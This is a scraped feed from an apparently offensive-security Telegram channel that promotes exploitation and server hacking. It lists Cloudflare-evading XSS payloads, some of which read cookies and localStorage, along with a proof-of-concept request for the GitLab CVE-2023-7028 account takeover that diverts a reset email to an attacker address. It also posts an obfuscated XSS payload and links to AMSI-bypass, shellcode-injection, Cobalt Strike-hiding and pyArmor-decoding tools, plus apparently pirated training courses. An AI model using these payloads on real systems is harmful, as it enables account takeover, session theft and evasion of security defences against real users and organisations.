0Day.Today | Learn Exploit | Zero World | Dark web |
18.7K subscribers
1.23K photos
122 videos
487 files
1.26K links
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

تبلیغات : @LearnExploitAds

IR0Day.Today
Download Telegram
ZeroBypasser.rar
41.6 MB
[+] How to Decode pyArmor codes ( Tutorial )
— > 0Bypasser.py
—— > pydumpck lib
———-—- > Method01



Password :
0101000101000101011110000110110001011001010110000100101001110101010100100101100001101000011101110110001001000111001110010111000001100100010001100011100001101011010010100100011000111001011101110110010101010101010001100111100101100010010101110011100101111001


#pyArmor #Decode #Tutorial

IR0Day.Today Bax
@LearnExploit
@Tech_Army
👎176👍52🆒1
🤣⚡️

#fun
——————
0Day.Today
@LearnExploit
@Tech_Army
😁181👍1👨‍💻1
AllHackingTools - All-in-One Hacking Tools ( for Termux )

Github

#Tools
——————
0Day.Today
@LearnExploit
@Tech_Army
👍6👎2
F#ck AMSI! How to bypass Antimalware Scan Interface and infect Windows

Read

#bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
3🔥1
CloudFlare Payload ⚡️

<svg%0Aonauxclick=0;[1].some(confirm)//

<svg onload=alert%26%230000000040"")>

<a/href=j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;&lpar;a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;(1)&rpar;>

<svg onx=() onload=(confirm)(1)>

<svg onx=() onload=(confirm)(document.cookie)>

<svg onx=() onload=(confirm)(JSON.stringify(localStorage))>

Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();

"><img%20src=x%20onmouseover=prompt%26%2300000000000000000040;document.cookie%26%2300000000000000000041;

Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();

"><onx=[] onmouseover=prompt(1)>

%2sscript%2ualert()%2s/script%2u -xss popup

<svg onload=alert%26%230000000040"1")>

"Onx=() onMouSeoVer=prompt(1)>"Onx=[] onMouSeoVer=prompt(1)>"/*/Onx=""//onfocus=prompt(1)>"//Onx=""/*/%01onfocus=prompt(1)>"%01onClick=prompt(1)>"%2501onclick=prompt(1)>"onClick="(prompt)(1)"Onclick="(prompt(1))"OnCliCk="(prompt`1)"Onclick="([1].map(confirm))`

#payload
——————
0Day.Today
@LearnExploit
@Tech_Army
4👍2
👁 Shellter 👁

⚠️ The video tutorial is included in the file ⚠️

💬 is a dynamic shellcode injection tool aka dynamic PE infector.

📊 Payloads List:
⚪️ meterpreter_reverse_tcp
⚪️ meterpreter_reverse_http
⚪️ meterpreter_reverse_https
⚪️ meterpreter_bind_tcp
⚪️ shell_reverse_tcp
⚪️ shell_bind_tcp
⚪️ WinExec
⚪️ and many other options...

😸 Github

⬇️ Download
🔒 BugCod3

#shellter #msf #payload #bind

🔥 0Day.Today
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3❤‍🔥11🔥1
Hide CobaltStrike - Hide your CobaltStrike PRO⚡️

Hide Your CobaltStrike with CloudFlared Tunnel and Microsoft 100 Traffic%

Github

#trick #cobaltstrike
——————
0Day.Today
@LearnExploit
@Tech_Army
❤‍🔥21👍1
Bypass Fuzzer - Fuzz 401/403/404 pages for bypasses

Github

#bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
❤‍🔥5👍3🤝1
Udemy - Bug Bounty Hunting Guide to an Advanced Earning Method

Download

#Download
————
0Day.Today
@LearnExploit
@Tech_Army
❤‍🔥53👍1
🐶 SANS All Courses 🐶

💬
Cyber Security Courses, Training, Certifications and Resources
The SANS Promise: Everyone who completes SANS training can apply the skills and knowledge they’ve learned the day they return to work.

💸 Price : 100,000 $ Plus ✔️

📂 Size : 152.98 GB

⬇️ Download

#Sans #Courses

🔥 0Day.Today
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
❤‍🔥9🔥31
CVE-2023-7028 - GitLab CE/EE Account Takeover via Password Reset without user interactions

Poc: user[email][]=valid@email.com&user[email][]=attacker@email.com

#CVE #POC
————
0Day.Today
@LearnExploit
@Tech_Army
🆒63👎1
Exploiting XSS with Javascript/JPEG Polyglot

Read

#XSS
——————
0Day.Today
@LearnExploit
@Tech_Army
❤‍🔥7
CVE-2023-6875 - Authorization Bypass vulnerability in POST SMTP Mailer, a WordPress plugin with over 300,000+ active installations

POC

Read

#Bypass #CVE #POC #Wordpress
——————
0Day.Today
@LearnExploit
@Tech_Army
🔥311
XSS payload with Alert Obfuscation, for bypass RegEx filters⚡️

<img src="X" onerror=top[8680439..toString(30)](1337)>

#XSS #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
2👍2
سایت رسمی Notcoin

notco.in

#News #Telegram
——————
0Day.Today
@LearnExploit
@Tech_Army